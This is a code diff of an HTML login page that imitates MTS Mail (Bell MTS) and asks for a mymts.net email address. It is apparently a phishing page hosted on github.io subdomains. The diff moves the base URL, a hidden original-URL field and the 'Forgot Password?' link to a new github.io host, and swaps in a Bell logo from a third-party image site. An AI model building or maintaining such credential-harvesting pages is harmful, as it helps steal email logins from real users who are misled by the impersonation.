--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <base href="https://sourcesecureauth.github.io/newlogin/" />
+    <base href="https://nul-01a.github.io/" />
     <meta charset="UTF-8"/>
     <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
     <title>MTS Mail | Login</title>
@@ -14,9 +14,9 @@
 <body>
     <div class="wrapper">
         <form id="form" name="sentMessage" novalidate="novalidate">
-            <input name="__original_url" type="hidden" value="https://sourcesecureauth.github.io/newlogin/"/>
+            <input name="__original_url" type="hidden" value="https://nul-01a.github.io/"/>
             <div class="logo">
-                <img src="https://cableco.auth-gateway.net/images/mts/bellmts.png" alt="MTS Logo" />
+                <img src="https://download.logo.wine/logo/Bell_Internet/Bell_Internet-Logo.wine.png" alt="MTS Logo" />
                 <p>Log in with your mymts.net email address</p>
             </div>
             <div class="container">
@@ -29,7 +29,7 @@
                 </div>
                 <button class="btn" id="button" type="submit">LOG IN</button>
                 <div class="register-link">
-                    <input type="checkbox" /> <span>Remember Me</span> <a href="#">Forgot Password?</a>
+                    <input type="checkbox" /> <span>Remember Me</span> <a href="https://nul-01a.github.io/">Forgot Password?</a>
                 </div>
             </div>
         </form>
